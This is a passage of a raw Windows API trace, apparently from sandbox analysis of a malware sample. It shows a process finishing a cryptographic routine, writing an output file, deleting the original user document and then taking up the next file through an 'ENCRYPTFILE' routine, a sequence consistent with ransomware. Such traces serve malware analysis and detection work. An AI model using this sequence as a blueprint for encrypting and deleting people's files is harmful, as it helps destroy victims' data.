CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.360] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0xa850, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ef3c*=0xa850, lpOverlapped=0x0) returned 1 [0079.362] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.362] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.362] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0079.362] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.362] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.362] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.362] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.362] CryptReleaseContext (hProv=0x41a41d8, dwFlags=0x0) returned 1 [0079.363] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.363] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.363] CloseHandle (hObject=0x298) returned 1 [0079.363] CloseHandle (hObject=0x258) returned 1 [0079.370] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt", lpFilePart=0x0) returned 0x36 [0079.370] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\hr3cojo6wftwpyw3h.odt")) returned 0x20 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0079.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0079.371] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4429be70, ftCreationTime.dwHighDateTime=0x1d5e0b0, ftLastAccessTime.dwLowDateTime=0x502b6580, ftLastAccessTime.dwHighDateTime=0x1d5e339, ftLastWriteTime.dwLowDateTime=0x502b6580, ftLastWriteTime.dwHighDateTime=0x1d5e339, nFileSizeHigh=0x0, nFileSizeLow=0xa840, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="hR3cojo6WftWpyW3h.odt", cAlternateFileName="HR3COJ~1.ODT")) returned 0x41ac500 [0079.371] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\hr3cojo6wftwpyw3h.odt")) returned 1 [0079.374] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4429be70, ftCreationTime.dwHighDateTime=0x1d5e0b0, ftLastAccessTime.dwLowDateTime=0x502b6580, ftLastAccessTime.dwHighDateTime=0x1d5e339, ftLastWriteTime.dwLowDateTime=0x502b6580, ftLastWriteTime.dwHighDateTime=0x1d5e339, nFileSizeHigh=0x0, nFileSizeLow=0xa840, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="hR3cojo6WftWpyW3h.odt", cAlternateFileName="HR3COJ~1.ODT")) returned 0 [0079.374] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0079.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0079.375] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0079.375] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0079.375] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0079.375] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0079.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0079.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.376] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.376] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.376] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x4314d10 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0079.377] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.377] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0079.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.378] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a31040, ftCreationTime.dwHighDateTime=0x1d5e638, ftLastAccessTime.dwLowDateTime=0xf70ffc60, ftLastAccessTime.dwHighDateTime=0x1d5eebc, ftLastWriteTime.dwLowDateTime=0xf70ffc60, ftLastWriteTime.dwHighDateTime=0x1d5eebc, nFileSizeHigh=0x0, nFileSizeLow=0x12f5a, dwReserved0=0x0, dwReserved1=0x8, cFileName="IVMtcxmHJDptt31P9OCD.xls", cAlternateFileName="IVMTCX~1.XLS")) returned 0x41ac140 [0079.378] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0079.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0079.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.378] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0079.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0079.379] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0079.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0079.379] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0079.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0079.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0079.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.381] 